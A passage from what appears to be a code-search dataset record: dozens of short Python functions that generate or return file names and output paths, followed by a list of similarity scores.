str(level).zfill(2)\n return f\"{name_s}_{field_s}_{level_s}_{time_s}.{ext}\"", "def out_filename(self, filetype, format='old', dir=Location.OUT_DIR):\n filename = self.filename(filetype=filetype, format=format)\n #return Path(dir) / filename\n return filename", "def getOutputFilename(self, filename):\n return filename[:-4] + \".txt\"", "def filename(self) -> str:\n return self.__location.filename", "def output_file_name_maker(args):\n log.debug(\"Entering output_file_name_maker()\")\n path = os.getcwd() + '/out_files/'\n if not os.path.isdir(path):\n os.mkdir(path)\n\n if args.output is None:\n out_file_name = path + args.input[:-4] + '_' + args.type + '_' + args.layer\n else:\n out_file_name = path + args.output\n\n log.debug(\"Exiting output_file_name_maker()\")\n return out_file_name", "def _gen_image_filename(instance, filename):\n # First, store the original filename in the model\n instance.original_filename = filename\n\n return _unique_path(instance.owner.pk, filename)", "def create_html_filename(coord_filename, name_ending):\r\n outpath = coord_filename.split('/')[-1] + name_ending\r\n return outpath", "def generate_filename(player_name):\n name = player_name.split()\n filename = '_'.join(name).lower()\n return filename", "def file_name(product, ext='json'):\n return f\"./output/{product}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}_transformed_{version}.{ext}\"", "def get_filename(self):\n return self._filename", "def _get_file_name(name: types.TSeedName) -> str:\n return f\"{name}.yml\"", "def file_on_disk_name(instance, filename):\n return generate_file_on_disk_name(instance.checksum, filename)", "def filename(self):\n return self.__filename", "def _get_station_filename():\n output_dir = os.path.join(output, state, station)\n if not os.path.isdir(output_dir):\n logger.debug(\"Creating directory %s\", output_dir)\n os.makedirs(output_dir)\n return os.path.join(output_dir, \"%s.%s\" % (c_time, format))", "def get_name(self):\n return self.file_name", "def generate_file_name(well, channel, desc):\n \n return \"bPLATE_w\" + 
well + \"_\" + desc + \"_c\" + channel + \".png\"", "def get_chunk_filename(self, number):\n return '%s-%s.tmp' % (self.identifier, number)", "def base_filename_for_feed_item(feed_item):\n return \"{}_{}\".format(\n int(to_epoch(feed_item.upload_time)),\n feed_item.video_id\n )", "def createname(cls):\n name = config.get(\"pyzombie_filesystem\", \"execbase\")\n name = \"{0}_{1}\".format(name, datetime.utcnow().strftime(\"%Y%jT%H%M%SZ\"))\n if os.path.isdir(Executable.execdirpath(name)):\n #Need to handle the rare case of duplicate resource names---this\n #will happen all the time in testing, but rarely in production.\n index = 0\n altname = \"{0}_{1:03}\".format(name, index)\n while os.path.isdir(Executable.execdirpath(altname)):\n index = index + 1\n altname = \"{0}_{1:03}\".format(name, index)\n name = altname\n return name", "def get_file_name(instance, filename):\n filename = make_unique_filename(filename)\n return os.path.join('uploads/profile_pics', filename)", "def acquire_image_filename(self):\n\t\titem_key = self.contents_data[ITEM_KEY]\n\t\tif not item_key: return None\n\t\treturn \"portrait_\" + item_key + \".bmp\"", "def create_savename(self):\n \n savename = self.config.get('grid', 'dir') + self.fname.split('/')[-1]\n newsuffix = '_gridded_%ix%ix%i.nc' % (self.nx, self.ny, self.nz)\n savename = savename.replace('.nc', newsuffix)\n \n return savename", "def filename(self):\n return self.system.fileName()", "def GetFileName():\r\n d = GetData()\r\n return d.filename", "def get_filename(self):\n\n return self._filename", "def generate_temp_path(self, file_format=\"\"):\n file_name = os.path.join(\n self.temp_folder,\n f\"temp_{str(time.time()).replace('.', '')}\"\n )\n if file_format:\n file_name += f\".{file_format}\"\n self.logger.debug(f\"Created filename at {file_name}\")\n return file_name", "def file_name(self):\n \n file_name = stringify(self._file_name)\n if file_name is None:\n file_name = stringify(self._project.file_name)\n if file_name is None:\n with current_context() as ctx:\n file_name = stringify(ctx.get('ninja.file_name', DEFAULT_NAME))\n if file_name is not None:\n file_name = '{}.ninja'.format(file_name)\n return file_name", "def __diff_filename(self):\n diff_dir = os.path.join(self.__folder, Reference.DIFF_OUT)\n if not os.path.exists(diff_dir):\n os.makedirs(diff_dir)\n return os.path.join(diff_dir, self.__name +'.jpg')", "def GetOutputFilename(self, directory=None):\n if self.forced_filename:\n logging.debug('Forced filename or pre-computed file name = %s', self.filename)\n return self.filename\n\n tags = dict()\n\n # Base tag\n tags['base'] = f\"{self['ARTIST']} - {self['DATE_RECORDED']} - {self['TITLE']}\"\n\n # Setup version subinfo\n tags['version'] = f\" ({self['VERSION']})\" if self[\"VERSION\"] else \"\"\n\n # Setup label / release subinfo\n channels = self.channels if self.channels != '2.0' else ''\n if self[\"ORIGINAL_MEDIUM\"] == \"CD\":\n labeltag = f\"{self['LABEL']} {self['ISSUE_DATE']} {channels}\"\n else:\n labeltag = f\"{self['LABEL']} {self['ISSUE_DATE']} {self['ORIGINAL_MEDIUM']} {channels}\"\n labeltag = labeltag.strip()\n tags['label'] = labeltag and f\" ({labeltag})\"\n\n # Setup disc tag\n if self[\"PART_NUMBER\"]:\n disctag = f\" (Disc {self['PART_NUMBER']}) {self['DISC_NAME']}\"\n else:\n disctag = f\" {self['DISC_NAME']}\"\n tags['disc'] = disctag.rstrip()\n\n # Merge into filename\n filename = f\"{tags['base']}{tags['version']}{tags['disc']}{tags['label']}{ext.WAV}\"\n # Replace invalid characters with either a dash or remove them\n 
filename = re.compile(\"[<>:/\\\\\\\\]\").sub(\"-\", filename)\n filename = re.compile(\"[|?*]\").sub(\"\", filename)\n # Replace invalid double quotes with valid single quotes\n filename = filename.replace('\"', \"'\")\n\n if directory:\n return os.path.join(directory, filename)\n return filename", "def filename(self):\n return self.tag(\"filename\")", "def generate_filename(filename: str) -> str:\n return f\"{str(uuid.uuid4())}.{get_extension(filename)}\"", "def data_filename(self) -> str: # type: ignore[return-value]\n return os.path.abspath(self.name) # type: ignore", "def generate_temp_filename(self):\n prefix = self.generate_filename_prefix()\n now = datetime.now()\n # Ok that might not be the best timestamp system, but it's\n # enough for our needs.\n timestamp = '-'.join([\n ''.join([str(x) for x in now.timetuple()]),\n str(now.microsecond),\n str(randint(10000, 99999))])\n\n filename = prefix + timestamp\n return find_filename(self.tempdir,\n filename)", "def title(self):\n if self.file_name is None:\n return None\n else:\n fname = os.path.split(self.file_name)[-1]\n fname, *ext = fname.rsplit('.', 1)\n procgen = ext and ext[0] in ('json', 'yaml')\n if procgen and self._seed and self._seed.spawn_key:\n # Append the spawn key as the episode number\n fname += '-e' + str(self._seed.spawn_key[-1])\n return fname", "def filename(self) -> str:\n return self.definition.slug", "def co_filename(self):\n assert (\n self.filename is not None\n ), \"co_filename requires Target created from filename\"\n return self.filename.strpath", "def _PartName(self,partindex,nparts):\n\n\t\tfrom tempfile import mkstemp\n\t\timport os\n\n\t\tp = '%d_%d' % (partindex, nparts * nparts - 1)\n\t\tfd,name = mkstemp(prefix = p, suffix = '.image')\n\t\tos.close(fd)\n\t\tself.result = name\n\t\treturn name", "def _filename(self, corotid):\n from datasource import DataSource\n self.corotid = corotid\n self.corot = DataSource(database='corot', user='sro', host='pina.aip.de')\n \n query = \"\"\"SELECT run_code, hlfccdid, win_id \n FROM corot \n WHERE corotid = %d;\"\"\" % self.corotid\n result = self.corot.query(query)\n \n par = {'run': result[0][0],\n 'half': result[0][1].rstrip('RL'), \n 'win': result[0][2]}\n filename = '/work2/jwe/CoRoT/%(run)s/data/%(run)s_%(half)s_%(win)04d.fits' % par\n logger.info('%d = %s' % (corotid,filename))\n return filename", "def get_file_name(self):\n return self.path.name[6:]", "def hap_filename(self, filetype):\n if filetype == 'events':\n return self.folder('events') / 'run_{:07d}_{}_eventlist.fits'.format(self.obs_id, self.hap_config)\n # return self.folder('events') / 'events_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'aeff':\n return self.folder('irfs') / 'aeff_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'edisp':\n return self.folder('irfs') / 'edisp_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'psf_3gauss':\n return self.folder('irfs') / 'psf_3gauss_{:06d}.fits.gz'.format(self.obs_id)\n else:\n raise ValueError('Invalid {} {}'.format(filetype))", "def hap_filename(self, filetype):\n if filetype == 'events':\n return self.folder('events') / 'run_{:07d}_{}_eventlist.fits'.format(self.obs_id, self.hap_config)\n # return self.folder('events') / 'events_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'aeff':\n return self.folder('irfs') / 'aeff_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'edisp':\n return self.folder('irfs') / 'edisp_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'psf_3gauss':\n return self.folder('irfs') / 
'psf_3gauss_{:06d}.fits.gz'.format(self.obs_id)\n else:\n raise ValueError('Invalid {} {}'.format(filetype))", "def hap_filename(self, filetype):\n if filetype == 'events':\n return self.folder('events') / 'run_{:07d}_{}_eventlist.fits'.format(self.obs_id, self.hap_config)\n # return self.folder('events') / 'events_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'aeff':\n return self.folder('irfs') / 'aeff_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'edisp':\n return self.folder('irfs') / 'edisp_{:06d}.fits.gz'.format(self.obs_id)\n elif filetype == 'psf_3gauss':\n return self.folder('irfs') / 'psf_3gauss_{:06d}.fits.gz'.format(self.obs_id)\n else:\n raise ValueError('Invalid {} {}'.format(filetype))", "def name(self):\n\t\tnam = super( textureFile, self ).name\n\t\tif self.hasUdim:\n\t\t\ttry:\n\t\t\t\treturn nam[:nam.rindex( '.' )]\n\t\t\texcept:\n\t\t\t\treturn nam\n\t\treturn nam", "def getFileName(self):\n return self.filename", "def generate(self, extension=None):\n filename = self._template.format(\n index=len(self._filenames),\n uuid=uuid4().hex,\n extension=extension or self._default_extension,\n )\n self._filenames.append(filename)\n return filename", "def _image_filename(image_name):\n return '{}.tar'.format(image_name.replace(':', '_').replace('/', '_'))", "def get_filename(self) -> str:\n\t\treturn self.xml_name", "def get_output_filename(item: str, root: str, i: int) -> str:\n element_split = item.split(\"/\")\n item, ext = element_split[-1].split(\".\")\n if i < 0:\n return f\"{root}/{'/'.join(element_split[:-1])}/{item}.{ext}\"\n else:\n return f\"{root}/{'/'.join(element_split[:-1])}/{item}_aug{i}.{ext}\"", "def _file_name(self, dtype_out_time, extension='nc'):\n out_lbl = utils.io.data_out_label(self.intvl_out, dtype_out_time,\n dtype_vert=self.dtype_out_vert)\n in_lbl = utils.io.data_in_label(self.intvl_in, self.dtype_in_time,\n self.dtype_in_vert)\n ens_lbl = utils.io.ens_label(self.ens_mem)\n yr_lbl = utils.io.yr_label((self.start_date.year, self.end_date.year))\n return '.'.join(\n [self.name, out_lbl, in_lbl, self.model.name,\n self.run.name, ens_lbl, yr_lbl, extension]\n ).replace('..', '.')", "def _file_name(size):\n timestamp = str(int(time.time()))\n return '%s_%dx%d.%s' % (timestamp, size, size, 'jpg')", "def get_filename(self):\n return self.get_package_name() + '-' + self.os + '-' + self.arch + GPPKG_EXTENSION", "def _create_id(self):\r\n buildfile_relpath = os.path.dirname(self.address.buildfile.relpath)\r\n if buildfile_relpath in ('.', ''):\r\n return self.name\r\n else:\r\n return \"%s.%s\" % (buildfile_relpath.replace(os.sep, '.'), self.name)", "def GetFileName(self):\n return self.file.GetPath()" ]
[ "0.7717686", "0.77164763", "0.74944174", "0.73645", "0.71533597", "0.7137769", "0.7135323", "0.71192485", "0.7112908", "0.7089001", "0.69753784", "0.69214255", "0.6892904", "0.6883375", "0.686652", "0.68156606", "0.6811536", "0.6807842", "0.6796225", "0.6787518", "0.6782904", "0.6766731", "0.67520434", "0.6737731", "0.6721141", "0.6708025", "0.6704186", "0.6704013", "0.670039", "0.6693806", "0.6688738", "0.666458", "0.6652345", "0.6650167", "0.66373026", "0.66280687", "0.6625388", "0.66229075", "0.6622495", "0.6619068", "0.6618845", "0.6596449", "0.6588556", "0.6579773", "0.656558", "0.6563641", "0.65604186", "0.6554955", "0.6551496", "0.6545742", "0.65387535", "0.6538446", "0.6531413", "0.6529823", "0.6525195", "0.650776", "0.64994967", "0.6493926", "0.64920515", "0.649058", "0.64874387", "0.64861256", "0.64772916", "0.6460261", "0.64554554", "0.6449987", "0.64482164", "0.64465845", "0.64407235", "0.64359814", "0.6434354", "0.643379", "0.64159095", "0.6414929", "0.640958", "0.6407059", "0.64017206", "0.6397808", "0.63951725", "0.63926524", "0.6389028", "0.6380674", "0.6379353", "0.637179", "0.6371101", "0.63688886", "0.6368155", "0.6368155", "0.6368155", "0.63661456", "0.6358031", "0.63524693", "0.6349265", "0.6348565", "0.6345411", "0.6342548", "0.63309705", "0.633005", "0.63297915", "0.632779" ]
0.7444088
3
Show tile number, and if saved to disk, filename.
def __repr__(self):
    if self.filename:
        return "<Tile #{} - {}>".format(
            self.number, os.path.basename(self.filename)
        )
    return "<Tile #{}>".format(self.number)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tilefilename(self, x, y, z):\n\n tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]\n return os.path.join(\"TileGroup%.0f\" % math.floor( tileIndex / 256 ),\n \"%s-%s-%s.%s\" % ( z, x, y, self.tileformat))", "def tilefilename(self, x, y, z):\n\n tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]\n return os.path.join(\"TileGroup%.0f\" % math.floor(tileIndex / 256),\n \"%s-%s-%s.%s\" % (z, x, y, self.tileformat))", "def save_display_tile(tile, save=True, display=False):\n tile_pil_img = tile_to_pil_tile(tile)\n\n if save:\n t = Time()\n img_path = slide.get_tile_image_path(tile)\n dir = os.path.dirname(img_path)\n if not os.path.exists(dir):\n os.makedirs(dir)\n tile_pil_img.save(img_path)\n print(\"%-20s | Time: %-14s Name: %s\" % (\"Save Tile\", str(t.elapsed()), img_path))\n\n if display:\n tile_pil_img.show()", "def get_chunk_filename(self, number):\n return '%s-%s.tmp' % (self.identifier, number)", "def write_file(self):\n if self.it_num % 5 == 0:\n #plt.imshow(self.grid)\n #plt.savefig(\"output%.4d.png\" % self.it_num, bbox_inches='tight')\n io.savemat(\"MLOutput%.4d\" % self.it_num, { \"Grid\":self.grid})", "def __str__(self):\n output = ['Tile ID {}'.format(self._tileid)]\n for ex, files in self._exposure_files.items():\n filenames = '- exposure {:08d}\\n'.format(ex)\n for f in files:\n filenames = '{} + {}\\n'.format(filenames, f)\n output.append(filenames)\n\n return '\\n'.join(output)", "def tilestr(tile, show_details=False, show_unit=True):\n # TODO: show_details\n \n if tile.get('unit_name') in [None, \"\"]:\n unit_name = \"----\"\n else:\n unit_name = tile['unit_name'][0:4]\n if tile['unit_army_id'] != '1':\n army_id = int(tile['unit_army_id'])\n if army_id > 5:\n raise Exception(\"not implemented: more than 5 armies: {}\".format(army_id))\n unit_name = unit_name[0:(army_id-2)].upper() + unit_name[(army_id-2):].lower()\n details = \"\"\n if show_details:\n details = \" \"+tile_details_str(tile)\n return \"{}@{:02d},{:02d}{}{}\".format(\n tile['terrain_name'][0:4], tile['x'], tile['y'], (\":\"+unit_name) if show_unit else \"\",\n details)", "def _filename(self, corotid):\n from datasource import DataSource\n self.corotid = corotid\n self.corot = DataSource(database='corot', user='sro', host='pina.aip.de')\n \n query = \"\"\"SELECT run_code, hlfccdid, win_id \n FROM corot \n WHERE corotid = %d;\"\"\" % self.corotid\n result = self.corot.query(query)\n \n par = {'run': result[0][0],\n 'half': result[0][1].rstrip('RL'), \n 'win': result[0][2]}\n filename = '/work2/jwe/CoRoT/%(run)s/data/%(run)s_%(half)s_%(win)04d.fits' % par\n logger.info('%d = %s' % (corotid,filename))\n return filename", "def saveTiles(z, x, y, ntiles, mapname, image, suffix = 'png', imgtype = None):\n for dx in range(0, ntiles):\n tilex = x*ntiles + dx\n ensureDirExists(getTileDir(mapname, z, tilex))\n for dy in range(0, ntiles): \n tiley = y*ntiles + dy\n offsetx = BORDER_WIDTH + dx*TILE_SIZE\n offsety = BORDER_WIDTH + dy*TILE_SIZE\n view = image.view(offsetx, offsety, TILE_SIZE, TILE_SIZE)\n if imgtype:\n view.save(getTilePath(mapname, z, tilex, tiley, suffix), imgtype)\n else:\n view.save(getTilePath(mapname, z, tilex, tiley, suffix))", "def generate_filename(\n self, directory=os.getcwd(), prefix=\"tile\", format=\"png\", path=True\n ):\n filename = prefix + \"_{col:02d}_{row:02d}.{ext}\".format(\n col=self.column, row=self.row, ext=format.lower().replace(\"jpeg\", \"jpg\")\n )\n if not path:\n return filename\n return os.path.join(directory, 
filename)", "def ftile(self):\n try:\n ftile = \"_\".join([self[\"grid_name\"], self[\"tile_name\"]])\n except TypeError:\n ftile = None\n return ftile", "def save_tile_img(tif, xyz, dataset, tile_size, region, zone, save_path, display=False):\n \n prefix = f'{region}{zone}{dataset}_'\n x,y,z = xyz\n tile, mask = rt_main.tile(tif, x,y,z, tilesize=tile_size)\n if display: \n plt.imshow(np.moveaxis(tile,0,2))\n plt.show()\n \n skimage.io.imsave(f'{save_path}/{prefix}{z}_{x}_{y}.png',np.moveaxis(tile,0,2), check_contrast=False)", "def save_tile(x,y,z,fpath):\n UA = \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/77.0\"\n tile_url = f\"https://{random.choice('abc')}.tile.openstreetmap.org/{z}/{x}/{y}.png\"\n # cmd = f\"wget --user-agent='please download' -O {fpath} {url}\"\n if os.path.exists(fpath):\n print(f\"Already have tile {fpath}!\")\n return 0\n if os.path.isdir(fpath):\n raise ValueError(f\"requested path {fpath} exists and is a directory!\")\n try:\n res = rq.get(\n url=tile_url,\n headers={'User-Agent': UA}\n )\n status = res.status_code\n if status == 200:\n with open(fpath,'wb') as of:\n of.write(res.content)\n return 0\n else:\n print(f\"Error: response {status} from server:\\n{res.reason}\")\n return status\n except Exception as e:\n print(f\"Error getting tile: {e}\")\n return 1", "def save_top_tiles_image(pil_img, slide_name):\n t = Time()\n filepath = slide.get_top_tiles_image_path(slide_name)\n pil_img.save(filepath)\n print(\"%-20s | Time: %-14s Name: %s\" % (\"Save Top Tiles Image\", str(t.elapsed()), filepath))", "def save_tile_summary_image(pil_img, slide_name):\n t = Time()\n filepath = slide.get_tile_summary_image_path(slide_name)\n pil_img.save(filepath)\n print(\"%-20s | Time: %-14s Name: %s\" % (\"Save Tile Sum\", str(t.elapsed()), filepath))", "def generate_grid_filename(grid, field, level, ext=\"png\"):\n name_s = generate_grid_name(grid).replace(\" \", \"_\")\n field_s = field.replace(\" \", \"_\")\n time_s = generate_grid_time_begin(grid).strftime(\"%Y%m%d%H%M%S\")\n level_s = str(level).zfill(2)\n return f\"{name_s}_{field_s}_{level_s}_{time_s}.{ext}\"", "def print_level_title(number):\n\n color = ['\\033[31m', '\\033[32m', '\\033[33m', '\\033[34m', '\\033[35m', '\\033[36m', '\\033[37m']\n reset_color = '\\033[0m'\n\n img_file = open('levels_title.txt')\n images = img_file.read().split('***\\n')\n img_file.close()\n\n os.system('clear')\n print(color[0] + images[number] + reset_color)\n time.sleep(3)", "def save_tile_data(tile_summary):\n\n time = Time()\n\n csv = summary_title(tile_summary) + \"\\n\" + summary_stats(tile_summary)\n\n csv += \"\\n\\n\\nTile Num,Row,Column,Tissue %,Tissue Quantity,Col Start,Row Start,Col End,Row End,Col Size,Row Size,\" + \\\n \"Color Factor,S and V Factor,Quantity Factor,Score\\n\"\n\n for t in tile_summary.tiles:\n line = \"%d,%d,%d,%4.2f,%s,%d,%d,%d,%d,%d,%d,%4.0f,%4.2f,%4.2f,%0.4f\\n\" % (\n t.tile_num, t.r, t.c, t.tissue_percentage, t.tissue_quantity().name, t.c_s, t.r_s, t.c_e, t.r_e, t.c_e - t.c_s,\n t.r_e - t.r_s,t.color_factor,\n t.s_and_v_factor, t.quantity_factor, t.score)\n csv += line\n\n data_path = slide.get_tile_data_path(tile_summary.slide_name)\n csv_file = open(data_path, \"w\")\n csv_file.write(csv)\n csv_file.close()\n\n print(\"%-20s | Time: %-14s Name: %s\" % (\"Save Tile Data\", str(time.elapsed()), data_path))", "def filename(self):\n return TaskInfo._filename(self.id)", "def imageSaveOutput(image,name,number):\n FileName = name +\" \"+number\n 
mpimg.imsave(\"test_images_output\"+'//'+FileName,image)\n return 0;", "def _prettyfilename(self):\n return f'{self.grandparentTitle} - {self.seasonEpisode} - {self.title}'", "def _prettyfilename(self):\n return self.title", "def filename(N, Dr, g, launch):\n\n return 'N%s_R%s_G%s_E%s.datR' % tuple(map(float_to_letters,\n (N, Dr, g, launch)))", "def _prettyfilename(self):\n return f'{self.title} ({self.subtype})'", "def save_tile_summary_on_original_image(pil_img, slide_name):\n t = Time()\n filepath = slide.get_tile_summary_on_original_image_path(slide_name)\n pil_img.save(filepath)\n print(\"%-20s | Time: %-14s Name: %s\" % (\"Save Tile Sum Orig\", str(t.elapsed()), filepath))", "def save_tiles(self, tiles, output_dir):\n save_path = f\"{output_dir}/tiles.npy\"\n tiles_np = np.asarray(tiles)\n np.save(save_path, tiles_np)\n print(\"done saving .npy!\")", "def print_to_file(self, board, filename, header=None):\n if not os.path.exists(self.folder):\n os.makedirs(self.folder)\n #filename = board.id if board.id else \"board.txt\"\n file = os.path.join(self.folder, filename)\n header_only = False #os.path.isfile(file)\n with (open(file,'a+')) as f:\n if header:\n print(\" === \", header, \" === \", file=f)\n else:\n print(\" === ??? === \", file=f)\n if header_only:\n print(\"board.id:\", board.id, file=f)\n print(\"rotation:\", board.rotation, \", pieces:\", board.count_pieces(), \", halfMoves:\", board.halfMoves, \", no-progress:\", board.noProgressCount, file=f)\n else:\n board.display(f)\n \n self.print_legal_moves(board, f)\n #print(\"executed_moves:\", board.executed_moves, file=f)\n f.closed \n return file", "def save_tiles(df,output_dir,namefunc = None):\n if not isinstance(df,pd.core.frame.DataFrame):\n raise TypeError(\"df must be a pandas DataFrame!\")\n if any(e not in df.columns for e in ('z','x','y')):\n raise ValueError(\"df must have columns x, y, and z\")\n if namefunc is None:\n def namefunc(x,y,z):\n return f'{z}_{x}_{y}.png'\n\n opath = os.path.abspath(os.path.expanduser(output_dir))\n Path(opath).mkdir(parents=True, exist_ok=True)\n L = df.shape[0]\n flocs = [''] * L\n for i,xyz in enumerate(zip(df['x'],df['y'],df['z'])):\n x,y,z = xyz\n print(f\"({i+1} of {L})...\")\n sleep(0.75)\n outloc = os.path.join(opath,namefunc(x,y,z))\n if save_tile(x,y,z,outloc) == 0:\n flocs[i] = outloc\n df = df.assign(file_loc = flocs)\n return df[df['file_loc'] != '']", "def _prettyfilename(self):\n return f'{self.title} ({self.year})'", "def backup_int_in_fname(num: int, file_name: str) -> None:\n with open(file_name, 'w') as fname:\n fname.write(str(num))", "def torrent_filename(view_url, debug):\n r = requests.get(view_url)\n tree = fromstring(r.content)\n title = tree.findtext('.//title')\n filename = title.replace('NT > ', '')\n torrent = filename +'.torrent'\n\n if not debug:\n return torrent\n\n if debug == 'Y':\n # Print variables before returning value\n print \"Title :\", title\n print \"Filename :\", filename\n print \"Torrent :\", torrent\n return torrent", "def save_grid(fname, grid):\n\twith open((\"%sGridFix\" % fname), 'w') as file_handler:\n\t for item in grid:\n\t file_handler.write(\"{}\\n\".format(item))\n\t pass\n # Return the name of the file\n\treturn (\"%sGridFix\" % fname)", "def displayImage():\n f = open(os.path.join(\"outputColor\",\"epoch_total.txt\"),\"r\")\n epochNum = int(f.readline())\n f.close()\n return Image.open(\"outputPhotosColor/image_at_epoch_{:04d}.png\".format(epochNum))", "def _get_seq_filename(self):\n fnd = self._get_session_dir()\n 
self.seq_number += 1\n fn = os.path.join(fnd, 'S%4.4d.tif' % self.seq_number)\n return fn", "def print_info(self, filename):\n info = (\n f\"\\n------------------------------------------------\" f\"\\nFile {filename} contains:\\n\"\n )\n for ch in range(1, self.ch_amount):\n info = info + (f\"{ch:02d}. {self.ch_name[ch]};\" f\" sampled at {self.freq[ch]} Hz\\n\")\n info = info + \"------------------------------------------------\\n\"\n\n LGR.info(info)", "def save_GRID( self , filename ):\n self._fwrite_GRID( filename )", "def print_tile(tile: Image.Image):\n width, height = tile.size\n\n pixels = tile.getcolors(width * height)\n\n most_frequent_pixel = pixels[0]\n\n for count, color in pixels:\n if count > most_frequent_pixel[0]:\n most_frequent_pixel = (count, color)\n\n r, g, b = most_frequent_pixel[1]\n\n light = r * 299/1000 + g * 587/1000 + b * 114/1000\n\n char = get_char_from_light(light)\n\n color = get_xterm_color(r, g, b)\n\n print(\"\\u001b[38;5;\" + str(color) + \"m\" + char, end=\"\\033[0m\")", "def title(self):\n if self.file_name is None:\n return None\n else:\n fname = os.path.split(self.file_name)[-1]\n fname, *ext = fname.rsplit('.', 1)\n procgen = ext and ext[0] in ('json', 'yaml')\n if procgen and self._seed and self._seed.spawn_key:\n # Append the spawn key as the episode number\n fname += '-e' + str(self._seed.spawn_key[-1])\n return fname", "def outfigname(num, ext, char=\"\"):\n return \"f{}{}{}\".format(num, char, ext)", "def __str__(self):\n return \"{filename}\".format(filename=self.image.original_filename)", "def _filename(task_id):\n return \"{}.json\".format(task_id)", "def playlist_num_filename(**kwargs):\n return f\"{kwargs['track_num']} - {default_filename(**kwargs)}\"", "def stich(data, title=None):\n # Get name, list of tiles, width and height\n name = data[\"levels\"][0][\"name\"] \n tiles = data[\"levels\"][0][\"tiles\"]\n width = data[\"levels\"][0][\"width\"]\n height = data[\"levels\"][0][\"height\"]\n\n # Create the directory to place all the downloaded tiles in\n if title: #if title provided, name directory based on that\n dirname = title\n else: #if title not provided, generate a name\n dirname = name + str(width) + str(height)\n os.makedirs(dirname, exist_ok=True)\n os.chdir(dirname)\n\n #Create the empty image based on dimensions\n result = Image.new('RGB', (width, height))\n tile_size = None \n\n # actually get the tiles\n for i in tiles:\n image = get_tile(i['url']) #download image\n if not tile_size:\n tile_size = image.size[0] # on the first tile get the image size\n result.paste(im=image, box=(i['x'] * tile_size, i['y'] * tile_size)) # each tile has a number which isn't\n # it's cooridnate in pixels but it's order. \n # To get pixel coordinate just multiply by the size of each tile\n result.save('final.jpeg') # save file in directory\n os.chdir(os.path.join( os.path.dirname( __file__ ), '..' 
)) # then navigate back up to the base directory", "def __str__(self) -> str:\n\n return f\"{self.filename}:{self.line}:{self.flag}\"", "def generate_file_name(self):\n self._session_iterator = None # New file invalidate old interator\n self._img_count += 1\n self._current_file = '{0}/frame_{1}.jpg'.format(self._relative_path,self._img_count)\n return self.current_file", "def doTile(tile):\n global d, fmt, output, img, demag\n # get adjusted upper left coordinate for tile\n xstart,ystart=getCoords(tile)\n px = 256//demag\n tumor,blank=0,0\n for y in range(0,px):\n for x in range(0,px):\n curry,currx = y+ystart,x+xstart\n B,G,R = img.item(currx,curry,0),img.item(currx,curry,1),img.item(currx,curry,2)\n if B > 220 and G > 220 and R > 220:\n blank += 1\n if blank > (px**2)/2:\n print('removing %s' % tile)\n #os.remove(tile)\n return(1)\n if B < 70 and G > 180 and R < 70:\n tumor = 1\n print(\"%s tumor = %d\" % (tile,tumor))\n output.write(str(tumor)+',')\n \n blank = int(blank*2 > px**2)\n tumor = (tumor > 0)\n return(blank)", "def save_as_fits(self, filename):", "def get_tilename_cache_file(tablename):\n dir=get_tilename_cache_dir()\n fname='%s-tilenames.fits' % tablename\n return os.path.join(dir, fname)", "def __str__(self):\n if self._rank is None:\n rank_str = \"\"\n else:\n rank_str = str(self._rank + 1)\n\n if self._file is None:\n file_str = \"\"\n else:\n file_str = chr(self._file + 97)\n\n return file_str + rank_str", "def main():\n\tparser = construct_parser()\n\targs = parser.parse_args()\n\ttiles = slice(args.image, args.num_tiles, save=False)\n\tsave_tiles(tiles, prefix=get_basename(args.image), directory=args.dir,\n\t\t format=args.format)", "def filename(self):\n return '%s%s' % (self.identifier, self.extension)", "def fname_tsk1(tup): #Task 1 & 2\n fname1 = f\"file_{str(tup[0]).zfill(3):}: {tup[1]:.2f}, {tup[2]:.2e}, {tup[3]:.2e}\"\n return(fname1)", "def generateFileName(self):\n return 'Covid' + self.map_type + '.html'", "def save(self):\n print(\"Clicked S(ave)\")\n saved_tiles = []\n for tile in self.tiles.sprites():\n # Append tiles pos to correct list if tile is occupied\n if not tile.is_available:\n tiles_attr = {\"type\": tile.tile_type, \"pos\": tile.rect.topleft}\n saved_tiles.append(tiles_attr)\n save_tiles(saved_tiles, lvl=\"02\")\n print(saved_tiles)\n # Flash white screen when level is saved\n self.surface.fill(s.WHITE)\n pygame.display.flip()\n pygame.time.wait(100)\n print(\"Saved\")", "def download_tile(map_layer, zoom, x, y):\n try:\n tile_url = map_layer.get_tile_url(zoom, x, y)\n tmp_file, headers = urllib.request.urlretrieve(tile_url)\n return (x, y), tmp_file\n except URLError as e:\n app.logger.info(\"Error downloading tile x={}, y={}, z={} for layer {}: {}\".format(\n x, y, zoom, map_layer, e.reason))\n return (x, y), pkg_resources.resource_filename(\"geos\", \"static/empty_tile.png\")", "def acquire_image_filename(self):\n\t\titem_key = self.contents_data[ITEM_KEY]\n\t\tif not item_key: return None\n\t\treturn \"portrait_\" + item_key + \".bmp\"", "def get_display_name(self, short=False):\n if self.filename is None:\n return '[New file]'\n elif short:\n return os.path.basename(self.filename)\n else:\n return self.filename", "def _save_mst_tile(tile, i, preread_ifgs):\n mst_tile = mst.mst_multiprocessing(tile, dest_tifs, preread_ifgs, params)\n # locally save the mst_mat\n mst_file_process_n = join(params[cf.TMPDIR], 'mst_mat_{}.npy'.format(i))\n np.save(file=mst_file_process_n, arr=mst_tile)", "def __getTileIterName(self, iter_name, level):\n return 
